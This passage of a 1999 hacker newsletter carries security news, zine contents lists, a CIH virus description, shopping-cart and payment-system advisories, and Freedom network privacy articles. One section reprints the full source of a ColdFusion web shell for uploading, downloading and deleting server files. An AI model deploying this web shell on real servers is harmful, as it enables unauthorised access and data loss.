hacker attacks. The ISPs asked the Ministry to perform
the scans because they where the "experts" in this
area. Users where not informed of the scans
beforehand. This new report of scans is evidently the
cause of yesterdays report that Ms Lee, 21, was being
"attacked" by the Ministry of Home Affairs. (Sure wish I
lived somewhere where everyone looked after my well
being so closely)
Straits Times
http://straitstimes.asia1.com.sg/one1/one1.html
Nando Times
http://www.techserver.com/story/body/0,1634,43806-70661-511093-0,00.html
++ India Stomping Out Piracy
From HNN http://www,hackernews.com/ April 29th
contributed by Dumbo
Officials in India want to stomp out piracy. They felt
that the best way to do this was put their foot down
and the bigger the foot the better. So they got an
elephant to stomp on confiscated pirated CDs in New
Delhi's Nehru Place.
http://www.news.com/News/Item/0,4,0-35780,00.html?st.ne.ni.lh
++ MS Sues FLA Companies
From HNN http://www,hackernews.com/ April 29th
contributed by Code Kid
Microsoft is suing 15 Florida companies alleging that
they sold or installed illegal copies of the companies
software. Microsoft isn't able to estimate how much
software piracy costs the company but it is able to
estimate what it costs the state of Florida. Microsoft
claims that Florida lost 7,186 jobs in 1997 and $490
million in lost wages, tax revenue and retail sales. Yet, it
has no idea what piracy costs Microsoft.
http://www.techserver.com/story/body/0,1634,43487-70127-507733-0,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2249422,00.html
++ Antidote Vol. 2 #1 released
From HNN http://www.hackernews.com/
contributed to HNN by Lord Oak
The newest release of Antidote is now available. With
articles on Anonymous Surfing, ICQ99a Security
Glitches, Intruder Alert '99, the eBayla Bug and a whole
lot more.
Antidote; http://www.thepoison.org/antidote/issues/vol2/1.txt
++ Hackers Defended
From HNN http://www.hackernews.com/
contributed to HNN by erewhon
Mainstream media is actually publishing a positive and
accurate story about hackers. Better read it quick
before they pull it and come to their senses.
ABC News
http://abcnews.go.com/sections/tech/Geek/geek41.html
++ This has been up in the air for the last couple months or so, looks like
the ASIO (Australian Security Agency) is still pushing for the right to be
able to break into personal computers if such systems are thought to contain
data that is detrimental to the countries security...who watches the watchers?
From HNN http://www.hackernews.com/
ASIO wants Permission to Break into Home Computers.
contributed by Anonymous
The Australian Security and Intelligence Organization
wants a widening of its powers so that its agents may
'hack' into personal home computers. These new powers
will include the ability to manipulate data so that their
entry may not be detected as well as breaking
encryption around data that they want to see.
The Age; http://www.theage.com.au/daily/990428/news/news8.html
++ Keen Veracity 7 was released Apr 22nd I missed this last issue
-----------------------------------------------------------------------------
K E E N V E R A C I T Y
L E G I O N S O F T H E U N D E R G R O U N D
I S S U E # [7]
-----------------------------------------------------------------------------
--[CONTENTS]--
(1/8)--[Introduction]---------------------------------------[Digital Ebola]
(2/8)--[Redir games with ARP and ICMP]-------------------------------[yuri]
(3/8)--[FUN WITH THE ES-3810 AN ATM REALITY]--------------------[optiklenz]
(4/8)--[Ip Aliasing]-----------------------------------------------[guidob]
(5/8)--[Yet Another Newbies Guide to Linux Security]--------[Digital Ebola]
(6/8)--[UBE98 -- Unbreakable Encryption]----------------------[Joe Peschel]
(7/8)--[Windows 95 Protection]-------------------------------------[NtWak0]
++ b4b0 releases issue #7 also April 26th...full of goodness, get it today
(00). Greets, Hellos, Staff, What not.
(01). Introduction - by ph1x *y0r elite edit0r* (heed my advice)
(02). Hacking Shiva-Lan-Rover-Servers - [Hybrid]
(03). How to have an out of body experience - [ph1x]
(04). Womper language interpretor - [chrak]
(06). Buffer overflow exploitation - [ph1x]
(07). The stupidity that lies in credit fraud - [KKR]
(08). Screwing around with /dev/audio - [ph1x]
(09). My day in age(Firewall, a magic bullet?) - [rhinestone]
(10). d0x (For your harrassing enjoyment) - [pG]
(11). Coding a shell from the ground up - [ph1x]
(12). The art of writing shell code - [smiler]
(13). The telephone system/network part 1 - [pabell]
(14). Wu-ftpd remote/local exploit for [12]-[18] - [cossack/smiler]
(15). Wu-ftpd buffer overflow scanner for 12-18 - [ph1x]
(16). IRC lawgz, cybersex erotica - [b4b0]
(17). Revolution against the catholic church - [schemerz]
(18). bsaver.c overview - [cp4kt]
(19). Conclusion - [ph1x]
+ juarez ;)
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
More great poetry from Liquid Phire!;
From: "liquid phire" <liquidphire@hotmail.com>
To: cruciphux@dok.org
Cc: Uzi@Rave-Generation.dnx.co.uk
Subject: greatness
Date: Mon, 26 Apr 1999 23:08:26 PDT
Mime-Version: 1.0
Content-type: text/plain
***another? yes *sigh* oh but i must. sanity is only as close as a
pen.***
"to be great is to be misunderstood"
we are to be remembered as names, not faces. we are to be remembered
as notions of truth, not as images flashed on the evening news. the
cost of infamy and fame are more then those who possess might care to
admit. it is better to be great without being misunderstood, to change
the world without attracting undesired attentions.
the time for lies has passed, this is a dangerous spell and we can
leave no option of damnation open. the future of the internet will be
determined by the actions of those on it now, advocates of censorship
have found new hope due to recent untimely events. sinners tricked as
saints are controling the country as we now walk on thin ice.
safe are we within our bunkers of pretenses until the ebon shadow of
reckoning nears, when the end comes we need more to hold close to our
translucent hearts then the newspaper clippings and the vauge texts
that are our legacy. the media has gotten the best of this religion,
and our minds have gotten the best of our hearts.
as but comic book superheros that have flown to close to the sun our
luck will not last and the curtins will one day part to reveal a few
disillusioned clutching close their tattered capes. already some have
sold out, a mistake that can be easily made but should be avoided to
protect the integrity of what we should represent.
hope for understanding is not one of the desires that lies in mens'
hearts, no war cry has ever been for peace. the walls of the fortress
need to be smooth with no cracks and fissures to provide the
weaknesses needed for foes. the masses, like fire, can be used for
both good and evil, it is those that tame them that save, or damn, the
world.
phiregod
liquidphire@hotmail.com
please excuse all errors
i welcome all comments and constructive criticism at the above address
_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.com
-=-
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
*No comment, its issue 16 already, just read it.... ;-) this issue is dedicated to
*#99 and the folks in Denver... so sad we have to have copycats isn't it?
*
*
*
* - Ed
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Telecardnews site, phone card and smartcard cracking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://members.tripod.com/telecardnews/index.html
I stumbled across this site during web searches, it has some interesting info
on telephone card and smart card hacking and news about recent goings on in
that world.. here's a sampling of what they have online.
TELEPIRATES BUSTED ! Reports are
reaching us, as yet unconfirmed, that the notorious
Telepirates have been raided. "Heavies" allegedly in
the pay of Telecom Companies and Telecard
Manufacturers are believed to have carried out
vicious attacks on the Telepirates main premises in
Holland, Spain and USA. It is well known that they
had trusted agents world-wide who may or may not
have been effected by these raids and we await
confirmation of this report.
It can be confirmed that their main order page on the
net has been removed . This action may have been
performed by themselves or by the Law
Enforcement Agencies possibly involved. It has
been known for some time, that Gemplus (a major
smartcard producer) was thoroughly investigating
telecard piracy and those connected with it.
Nobody was more connected than the Telepirates
who flaunted their expertise across the whole world
wide web.
In view of this development, and a tip off from a
known Telepirate member. We recommend to our
readers (perish the thought that they would consider
anything remotely criminal) that they should not
under any circumstances send payments to the
Telepirates, until further notice as this will probably
end up sequestrated or in the hands of the
Authorities. It is also likely that Bank Accounts
have been compromised and possibly frozen.
Keep watching, we will keep you updated. If
you have any information regarding this
breaking story, contact us immediately in
confidence. We will not divulge the source.
send info
TELCOS INVOLVED IN BUST April 13th 1999
TELECARD SECURITY NEWS: This is the latest news on this story.
Our investigations confirm that major smartcard companies and telcos were at
least aware of the Telepirates bust. One international smartcard manufacturer
gave the following statement:
"We will neither confirm or deny any involvement concerning this criminal group.
Anyone who attempts to penetrate systems by illegal means, including the
perpetrators and their supposed clients are all law breakers and should be dealt
with only by the appropriate authorities".
We did contact representatives of other Telcos and smartcard manufacturers and
they all declined to comment on or off the record. In our enquiries to these
companies, we referred to the Telepirates only as "phonecard hackers who where
raided recently", yet two of these companies mentioned the "Telepirates" by name.
This was a touch suspicious and despite our insistance that they answer our
questions, the stock answer was "No Comment"!
Final Note: Our readers are reminded that THE TELECARD SECURITY NEWS cannot
condone or support any kind of illegal and criminal activities. We do strongly
support and encourage dissemination of information for security reasons and
lessons can be learned by all concerned....
Next update. Hopefully we will have more information from Telepirate spokesman
"Frazzle". Watch out for more of our news updates and if you have any information which
we can confirm. Please contact us: http://members.tripod.com/telecardnews/email.htm
@HWA
04.0 Coldfusion mole.cfm
~~~~~~~~~~~~~~~~~~~
This didn't make it into last weeks issue, here it is now, its the program that
can be used to up and download files to a coldfusion server.
From HNN http://www.hackernews.com/
<!---
This Cold Fusion template is intended for testing security
on ColdFusion application servers. It will let a web user
upload, download and delete files on a server.
Use this only for good, not evil.
Kevin Klinsky
kklinsky@themerge.com
--->
<CFPARAM NAME="DirPath" DEFAULT="#GetTempDirectory()#">
<CFSET THISTEMPLATE=GETFILEFROMPATH(GETTEMPLATEPATH())>
<CFIF LISTLAST("#DirPath#","\") IS ".">
<CFSET DIRPATH=GETDIRECTORYFROMPATH(DIRPATH)>
<CFELSEIF LISTLAST("#DirPath#","\") IS "..">
<CFSET DIRPATH=GETDIRECTORYFROMPATH(LEFT("#GetDirectoryFromPath(DirPath)#",LEN(GETDIRECTORYFROMPATH(DIRPATH))-1))>
</CFIF>
<CFIF ISDEFINED("uploadfile")>
<CFIF LEN(UPLOADFILE) GT 0>
<CFFILE ACTION="UPLOAD"
FILEFIELD="uploadfile"
DESTINATION="#DirPath#"
NAMECONFLICT="OVERWRITE">
File uploaded<BR><BR>
</CFIF>
</CFIF>
<CFIF ISDEFINED("deletefile")>
<CFSET DELETEFILE=DIRPATH&DELETEFILE>
<CFIF FILEEXISTS(DELETEFILE)>
<CFFILE ACTION="DELETE"
FILE="#deletefile#">
File deleted<BR><BR>
</CFIF>
</CFIF>
<CFIF GETFILEFROMPATH(DIRPATH) IS "" OR GETFILEFROMPATH(DIRPATH) IS ".">
<CFDIRECTORY DIRECTORY="#DirPath#"
NAME=DIRDETAILS
SORT="name ASC">
<CFOUTPUT>
<FONT SIZE="+2">#DirPath#</FONT><BR>
</CFOUTPUT>
<TABLE>
<TR>
<TD></TD>
<TD>Name</TD>
<TD ALIGN="right">Size</TD>
<TD>Modified date</TD>
</TR>
<CFOUTPUT QUERY="DirDetails">
<CFSET NEWPATH = URLENCODEDFORMAT(DIRPATH&NAME)>
<CFIF TYPE IS "Dir" AND NAME IS NOT "." AND NAME IS NOT "..">
<CFSET NEWPATH=NEWPATH&"\">
</CFIF>
<TR>
<TD>[#Type#]</TD>
<TD><A HREF="#ThisTemplate#?DirPath=#NewPath#">#Name#</A></TD>
<TD ALIGN="right">#Size#</TD>
<TD>#DateLastModified#</TD>
<CFIF TYPE IS "File">
<FORM ACTION="#ThisTemplate#?DirPath=#GetDirectoryFromPath(DirPath)#&deletefile=#URLEncodedFormat(Name)#" METHOD="post">
<TD><INPUT TYPE="submit" VALUE="Delete"></TD>
</FORM>
</CFIF>
</TR>
</CFOUTPUT>
</TABLE>
<CFOUTPUT>
<FORM ACTION="#ThisTemplate#?DirPath=#URLEncodedFormat(DirPath)#" ENCTYPE="multipart/form-data" METHOD=POST>
<INPUT TYPE="File" NAME="uploadfile" SIZE="30"><BR>
<INPUT TYPE="submit" VALUE=" Upload ">
</FORM>
</CFOUTPUT>
<CFELSE>
<CFFILE ACTION="Read"
FILE="#DirPath#"
VARIABLE="var_name">
<CFCONTENT TYPE="unknown:security.breach" FILE="#DirPath#" DELETEFILE="No">
</CFIF>
for more info on the ColdFusion hole and how to protect yourself or see if your server is vulnerable check
http://www.403-security.org/Htmls/news.htm and follow the bugtraq link.
@HWA
05.0 More info on the CIH virus
~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th from www.403-security.org
CIH virus infects Windows 95 and 98 EXE files. After an infected EXE is executed, the virus will stay in memory and
will infect other programs as they are accessed.
The CIH virus was first located in Taiwan in early June. After that, it has been confirmed to be in the wild in at least
France, Germany, The Netherlands, Sweden, China, Israel, Chile and Australia. CIH has been spreading very quickly
as it has been distributed through pirated software.
It seems that at least four underground pirate software groups got infected with the CIH virus, and they inadvertently
spread the virus globally in new pirated softwares they released through their own channels. These releases include
some new games which will spread world-wide very quickly. There's also a persistent rumor about a 'PWA-cracked
copy' of Windows 98 which would be infected by the CIH virus but Da
ta Fellows has been unable to confirm this.
Later on, CIH was available by accident from several commercial websites, including the Origin Systems website
where a download related to the popular Wing Commander game was infected.
What makes the CIH case really serious is that the virus activates destructively. When it happens the virus overwrites
most of the data on the computers hard drive. This can be recovered with recent backups.
However, the virus has another, unique activation routine: It will try to overwrite the Flash BIOS chip of the machine.
If this succeeds, the machine will be unable to boot at all unless the chip is reprogammed. The Flash routine will work
on many types of Pentium machines - for example, on machines based on the Intel 430TX chipset. On most
machines, the Flash BIOS can be protected with a jumper. By default, protection is usually off.
The CIH virus infects Windows executable files (EXE files). It does not infect Word or Excel documents. CIH works
under both Windows 95 and Windows 98, but it does not work under Windows NT.
CIH uses a peculiar way of infecting executables. As a result, the size of the infected files does not grow at all. The
actual size of the virus code is around 1 kB. The virus also employees advanced tricks in jumping from processor ring
3 to ring 0 in order to hook file system calls.
There are four known closely-related variants:
CIH v1.2 (CIH.1003): Activates on April 26th. This is the most common variant. It contains this text:
CIH v1.2 TTIT
CIH v1.3 (CIH.1010.A and CIH.1010.B): Activates on June 26th. Contains this text:
CIH v1.3 TTIT
CIH v1.4 (CIH.1019): Activates on 26th of every month. It is in the wild, but not particularily common. It contains
this text:
CIH v1.4 TATUNG
Note on disinfection: If you're using F-Secure Anti-Virus for Windows 95 v4.02, you need to exit Windows to disinfect
CIH. Choose Start/Restart in MS-DOS mode, then execute FSAV for DOS from the FSAV CD-ROM and disinfect your
hard drive with that.
By Astral
@HWA
06.0 E-commerce takes it in the gnards, more compromised carts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 14:39:47 +0200
From: Bo Elkjaer <boo@DATASHOPPER.DK>
To: BUGTRAQ@netspace.org
Subject: Re: Shopping Carts exposing CC data
Been doing some more searches for misconfigured webcarts exposing cc-information.
Seems like a pandora's box, that just opened.
Perlshop is vulnerable too if misconfigured:
Version?
Platforms?
Executable file: perlshop.cgi
Exposed directory: /store/customers/, /store/temp_customers/
Exposed orderinfo: Several files, eight-digit numbered names.
Status: adverware. Only requirement is to display a "powered by perlshop"-logo on
page.
Bo Elkjaer, Denmark
-=-
(hhp) SMPS advisory. (hhp)
----------------------------------------------
SMPS (Server merchant payment system) has default permission problems. The wrong
moded directory is Cybercashserver/smps* which gives complete access to view all the config
and database files. The most dangerous file that is left world readable is:
Cybercashserver/smps*.../merchants/admin.pw or maybe another various directory path/location
depending on the server and version of the software. The admin.pw contains a crypt(3)
passwd. This could lead to a system-wide compromise if it was to be cracked.
The official website for this software that was found in the README file currently
doesnt allow access to view the website which made it hard for me to build more information
about this software.
My suggestions to admins using this software is to disable this software, change
the modes on the directory and get in contact with the vendor of this software and find out
when they plan to release a new version of this software fixing this defualt problem. If
you want to play it safe, I would check your server to see if you have already been
cracked and hacked.
I have notified the vendors of this software about the problem and hope the best
to all the clients.
-elaich
4-29-99 10:35:53pm CST
-----------------------------------------
elaich of the hhp. hhp-1999(c)
Email: hhp@hemp.net
Web: http://hhp.hemp.net/
Voice: 1-800-Rag-on-gH pin: The-hhp-crew
hhp-ms: hhp.hemp.net, port:7777, pass:hhp
-----------------------------------------
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <www.pgp.com>
mQGiBDcl8CwRBAD7xCp+A5ORiRzMLS4mPstL1aJadSCXSGyNKEZZ6kZwdO3YhLCf
2vkeJF0OGe8KRfd8LRxP0f/3syg7lfH77m0OP8NXeoOHD48T8K4Mabp2WEJmUW0r
J6op94LjFUwqNqYuOa+bVULrotZY6iWlxBWunltu9wrqgP22RVtKAu0PVwCg/2SS
rYoDCNTH4dlzNcVcza5XuhMEALbmuKISbjeOqsVETYYMdQfr0M/m1YfztjJ2tDS7
bGfOCFpQUFLyCUt/FHHmlInXQWUSVCgjkp0/giFoY9dX+4IB8wLgfu68BOZM5fft
I5mxI0vyBSke2kHQTqf3vQ5Yveg6gIB8WW9Pi+MAwLMS3+Hmrar+4GCUOqe9w3yi
u1q3BADcAM3VkORpkifjK8pWex1fdfvGmLBX5PBuCexl5dpeXdVC+Ktncis9u4yh
5f/PI/g/Uk4T2D/nF5PA4tSkNvRJaPVZCXjFRfc4K+rzQxuYRePwXFgaHSk9cDnd
XBq5JM6iXLBGFIJpbbwWkftuFOaJLXdP/DqDaXkjbWXLbH9nN7QhZWxhaWNoIG9m
IGhocC4gPGhocEBoaHAuaGVtcC5uZXQ+iQBLBBARAgALBQI3JfAsBAsDAgEACgkQ
bSmqkM1thIxvkQCeIEUYJTwF5nC+T9DUcUqStqpwtiQAoIzw9fqSB026Q+w0CGWe
BPX9LD5ruQINBDcl8DMQCAD2Qle3CH8IF3KiutapQvMF6PlTETlPtvFuuUs4INoB
p1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZX9x2Uk89PY3bzpnh
V5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56NoKVyOtQa8L9GAFgr
5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsYjY67VYy4
XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zaf
q9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpMgs7AAICB/oCoABrcAodA+Qw
0QOzptm6arxtaRte4a6ZQs+N4Y63+S5oKBz4/atHGGIqgcxCUaaPCxfcqRMoz6Tw
ZhxOKe3/xKA+qPRfLP19P3nHcTLZqa/orvohDu235OQHBd5Mi6sr2MUcUL1WfsU7
fPZEjwu6d3MuXpjJUeFzNezJzIbXNzqFAVQawVH6lV+xGfqjD0zceGFGALvvGVxL
ANdmCzqjE1LFbqf1Zdd04lKYKSglX4PFz3Ly/jzi22GFxMuGf6ud4R80wUC0zBKO
RZHX3jPqjrqfbY9dq1vpBNDEugOYPqv3/lNlkoxUzKhJCZLPUcbQQs+BuNUUcRW9
dEkl71kuiQBGBBgRAgAGBQI3JfAzAAoJEG0pqpDNbYSMFgIAoMUE0SGIfqg0oj9e
oY9AHDAScmZtAKDgKF7STtRwB4KJ6/Q9HC3gUgGBbA==
=GJ0e
-----END PGP PUBLIC KEY BLOCK-----
06.1 E-commerce boom fueling Security Holes?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.thestandard.net/articles/display/0,1449,4307,00.html?home.tf
E-commerce Boom Fueling
Security Holes?
By Jack McCarthy and Elinor Mills
Recent breaches of customer privacy by online stores shows that early
concerns for Internet security were justified, industry experts said,
adding that smaller businesses rushing to get online are often the
culprits.
Just this week, an employee at an Internet service provider in Bellevue,
Washington, posted a warning on the Internet to systems administrators
and Web developers about the potential for Web sites exposing
information as a result of misconfigured e-commerce software.
Joe Harris, systems administrator for Blarg Online Services which hosts
e-commerce sites for companies, said Thursday that he discovered last
week that more than 100 online stores hosted by Blarg were inadvertently
revealing customer names, addresses, credit card numbers and other
purchasing information. One of the ways random Internet users could access
the information was by using certain keywords while doing searches on the
sites, he said.
Since he posted the warning, many of the affected Web sites have corrected
the problem, Harris said, but at least two stores were still exposing
customer information on their sites Thursday.
Such privacy breaches are expected to increase as more retailers go online.
"With the growth of the Internet and the use of e-commerce, you're going to get
more and more of these situations," said Bob Lewin, executive director of TRUSTe, a
Cupertino, Calif.-based group that monitors online privacy practices and offers seals of
approval to Web sites that agree to follow basic privacy guidelines.
Experts say the privacy breaches seem to be happening primarily with smaller
companies that might not have the expertise and sophistication to properly install
electronic commerce software or the money to hire experienced firms to do it for them.
"It's definitely an issue that impacts smaller online merchants that are either using
multiple site hosting services or are building their own using these simpler [turnkey]
commerce packages," said David Kerley at Jupiter Communications market research firm
in New York. "It's an area that larger online merchants are more sensitive to and more
knowledgeable about."
Along with the dramatic growth of e-commerce, smaller companies are racing
to sell online and creating greater demand than can be met for people who know how
to create secure Web sites, according to Kerley, "so people who aren't as experienced
are getting into the business."
Amateur Web designers can fail to follow instructions in using shopping-cart software
that takes orders from customers, Harris said. When the software is improperly
installed, the information can be exposed, for instance by being stored on a file that is
accessible to web surfers, he said.
Many small retailers use friends or untested companies to develop their Web sites, Harris
said. "They hear that their sister-in-law's cousin can do it, so they hire him," he said.
Basically, companies should be careful in selecting firms to set up and host their
e-commerce sites by getting references, using established firms and asking about privacy
and security upfront, the experts said. If they don't they'll not only lose
customers but growth of e-commerce in general will be impeded,
Lewin of TRUSTe said. "If you are going to put your store on the Web,
you are responsible for the information that's there," Harris said. "Your
client is trusting you to make sure you do everything in your power to
make sure that data is safe."
While smaller companies may be primarily at fault for privacy breaches
lately, data exposures at Web sites run by larger companies also can
happen and when they do they can pose an even greater risk,
according to Ari Schwartz, policy analyst at the Center for Democracy
and Technology in Washington, D.C.
"Smaller companies do cut corners, but the larger companies usually
have large databases and there's a lot more at stake, he said. "So
both [types of companies] need to pay adequate attention, especially
those people implementing software solutions for large numbers of
small companies."
At the same time, companies are becoming more aware of the
necessity for security. Nearly 700 Web sites are members of Truste
and more are joining all the time, Lewin said. "The majority of our
licensees are smaller organizations," he said. They "don't have time to
do the necessary investigations to find out what they should be doing
in the first place."
On their end, consumers should try to find out how secure the sites
they buy things from are. "It's no different than other markets. Buyer
beware," said Kerley of Jupiter.
There also need to be technical solutions that make it easier for
people to read privacy notices online so they can determine whether
the Web site is as secure as they want it to be, said Schwartz of the
CDT.
"Seems as though it takes a violation of peoples' privacy to make
people pay attention," Schwartz added.
The federal government may eventually give online merchants a push
in the direction of guaranteeing security. Although the Clinton
administration favors allowing the industry to regulate itself, agencies
such as the Department of Commerce and the Federal Trade
Commission have been discussing how to encourage privacy
protection and lawmakers have talked about enacting laws that would
make Web sites liable for privacy breaches on their sites.
Despite the privacy lapses that are occurring in the retailer rush to
sell online, the risk is still minimal to most consumers, according to
Kerley at Jupiter.
"There's not a huge risk for the consumer except to maybe have to
cancel a credit card," he said. "There are far more shady businesses
that are not on the Internet that have access and do access personal
information of a more sensitive nature. All it takes is a few dollars to
get a credit rating and credit report," for example, Kerley said.
Jack McCarthy and Elinor Mills write for the IDG News Service.
@HWA
07.0 Anonymity guaranteed (PCworld)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.pcworld.com/pcwtoday/article/0,1510,10700,00.html
Anonymity Guaranteed on the Net
For $9.95 per year, ISPs will erase all trace of your
Web travels.
by David Needle, special to PC World
April 26, 1999, 9:48 a.m. PT
Superman had a secret identity, and soon you may too, thanks to Zero Knowledge Systems, an Internet
security company that wants to give Web surfers total online privacy.
ZKS has created the Freedom Network, a band of 50 Internet service providers that route encrypted data
through what the company says is an untraceable path. Any data that represents your presence on the
Internet is encrypted and bounced around servers in the Freedom Network so there is no digital trail of who you
are or where you've been.
For the time being, participation in the Freedom Network is free while participating ISPs finish testing
their software. A full-fledged Windows-based client is due out later this summer for $49.95, complete with five
secret identities, aka "nyms," or pseudonyms. A 45-day free trial version will also be available. After the
first year, the cost is $9.95 per year, per nym.
"We're giving Internet users total privacy, which they've never had before," says Austin Hill, president of Zero
Knowledge Systems. "We don't even ask you to trust us because even we don't know where you are browsing."
You don't even have to belong to a Freedom Network ISP to join, though Hill says there may be some
performance advantage if you do. ISPs in the Freedom Network tend to be small to midrange players, with
larger Web providers taking a wait and see approach."Later on we'll want to bring some of the larger ISPs on
board," says Hill.
The Downsides of Privacy
"The privacy feature can't degrade the user experience it has to be invisible," says Jim Balderston, Director of
Zona Research. "And if you are promising 100 percent privacy protection, you have to deliver because
consumers aren't going to accept anything less."
Some people worry that greater Internet anonymity means more scam artists and criminal activity. For
example, an anonymous Web surfer might have an easier time harassing people online. However, ZKS
attempts to limit online harassment by honoring requests not to receive e-mail from nyms. And
harassment should be somewhat limited because it costs money to establish a pseudonym, according to
Hill.
"Like all freedom, this can be abused or used for good," says Hill. But, he adds, "we don't outlaw cars because
people sometime have accidents in them."
Worth the Price?
Still, are privacy guarantees worth even a small price to your average, law-abiding Web user already paying $20
or more per month to get online?
For a lot of people, yes. Parents, for example, might join the Freedom Network so that their children can
participate in online chat rooms without divulging their identity.
"The issue of privacy is a substantial one," says Zona's Balderston. "People don't realize how much information
has already been gathered about them. When you start seeing pop-up screens that say 'You bought boots at
such-and-such a Web site, now check out our camping gear,' that will be distressing to a lot of people; they're
going to look for some way to have anonymity online."
ISPs also benefit from joining the Freedom Network,Hill says, because it limits their legal liabilities. "We've
seen cases where users get into a flame war that ends up in a civil suit and the ISP gets dragged in," says
Hill. "It's a lot easier to be able to say, 'I don't have any data on this.' It's an encrypted stream of traffic."
"Our customers are deeply concerned about online privacy," says Paul Engels, vice president of I.D.
Internet Direct, Canada's second largest ISP and a member of the Freedom Network. Engels calls the ZKS
network "the most comprehensive and credible effort to put privacy back where it belongs--in our customers
hands."
@HWA
07.1 Anonymity guaranteed?
~~~~~~~~~~~~~~~~~~~~~
FreedomTM is easy-to-use software designed to give you total privacy
while on the Internet. This driver-level software runs in conjunction
with all your current Internet software, ensuring your privacy in a
totally transparent, unobtrusive way. Freedom uses high-grade public
key cryptography to encrypt the contents of any Internet
transmission, including e-mail, chat room, web browsing and
newsgroups. It also protects the source and destination of all Internet
traffic.
Freedom simultaneously
manages all of your digital identities,
watches all outbound traffic for personal information and
automatically encrypts and routes traffic through the Freedom
network,
transparently decrypts all incoming traffic,
places cookies into Cookie JarsTM,
filters spam.
Customized pseudonyms to manage your identities
Freedom allows you to create one or several digital pseudonyms. A
digital pseudonym lets you create a unique online identity for yourself
(which may or may not be like your true self) that you can use to
perform all your Internet-related tasks. You are the sole owner of the
pseudonyms, which can be configured to have different e-mail
addresses, geographic locations and encryption keys. Different
pseudonyms give you the opportunity to separately explore
completely different areas of the Internet and avoid being profiled by
Internet marketers.
Who do you want to be today?
You choose how to use your online identities. For example, if you like
to debate politics online you can designate one pseudonym as your
"politics" pseudonym. Use it when you post in political newsgroups,
surf activist web sites, e-mail your political contacts and chat in
political chat rooms. No one can trace it back to your real self.
Any concern you have about people monitoring you or collecting your
personal information on the Internet is gone. Your boss will not be
able to find out what you like to chat about on your own time.
Marketers cannot generate a profile of you and put you onto mailing
lists without your consent.
No one--not even Zero-Knowledge Systems--will be able to find out
who is behind a digital identity.
Full strength encryption and Cookie JarsTM
Each digital identity uses full strength encryption that ranges from
128-4096 bits. This transparent encryption permits all outgoing
Internet packets, e-mail and newsgroup postings to be encrypted,
and where appropriate, digitally signed by the pseudonym's public
key.
Every Freedom user is connected to a Freedom server that
anonymizes source information to protect your identity. When
sending e-mail both the sender and recipient's addresses are
encrypted, as well as the message itself.
Many web site place cookies (little bits of information) on your
computer to record and customize your visit. To prevent cookies from
revealing or correlating any of your identities, Freedom has a cookie
management system called Cookie Jars. Each digital identity has its
own Cookie Jar, and any cookie received by that identity is collected
in its individual jar. This way, your digital identities remain completely
separate from each other and from your real self.
Advanced spam control
Freedom also has advanced spam filtering tools so you can filter out
unwanted, unsolicited e-mail sent to your pseudonyms. When
enabled, Freedom's anti-spam functions eliminate 100% of unwanted
bulk email before it even gets to your mailbox.
For a complete list of Freedom's features and technical details, see
the white paper.
07.2 ZKS White paper
~~~~~~~~~~~~~~~
For diagrams (there are only two) view in html mode or visit this url
http://www.zeroknowledge.com/products/Freedom_Architecture.html
The Freedom Network Architecture
(Version 1.0)
Zero-Knowledge Systems, Inc.
This document describes the architectural components of the Freedom network. This document is intended for system administrators and potential Freedom Server operators. A solid
understanding of networking terminology and acronyms, such as SMTP, POP3, HTTP, TCP/IP, etc. is assumed. Familiarity with previously deployed building blocks of Internet privacy
systems, such as nymservers and remailers, is desirable. If you are unfamiliar with any of the above, please consult the sources listed in the bibliography at the end of this document.
<img src="http://www.zeroknowledge.com/products/cloud_diagram.gif" border=0></a>
Client-server Architecture
The Freedom product is composed of two primary elements: the client application and the server network. Any Internet user wishing to protect their privacy needs the Freedom client
application installed on their computer. The client application is compatible with current Internet protocols and works transparently. The server network is known as the Freedom
network. The Freedom network is made up of numerous Internet servers running the Freedom server-side application. The Freedom network provides a mechanism to ensure anonymous
connections between user and destination.
Freedom Network Components
Freedom Server Nodes
The Freedom Server Nodes are at the core of the Freedom network. Freedom Server Nodes have been deployed by ISP's, individuals, and organizations worldwide. The nodes are owned
and operated by Freedom partners independently of Zero Knowledge Systems. This assures that the user's privacy will be protected even if Zero Knowledge Systems itself was subject
to compromise. Each Freedom Server Node is comprised of four logical sub-systems. The subsystems are: Anonymous Internet Proxy (AIP), Anonymous Mail Proxy (AMP), Wormhole,
and Traffic Shaper.
Anonymous Internet Proxy (AIP)
The AIP provides the underlying anonymous TCP/IP connections. While current Freedom clients support only TCP-based protocols (with the exception of DNS), the AIP itself operates
at the IP level, thus allowing maximum flexibility for future feature enhancements and support for non-TCP based protocols. Each AIP performs the following actions upon startup.
Initialization
On start-up, the AIP loads its key cache stored on the local disk, and examines it to see which keys have expired. Each AIP has a list of five topologically neighboring AIPs stored on the
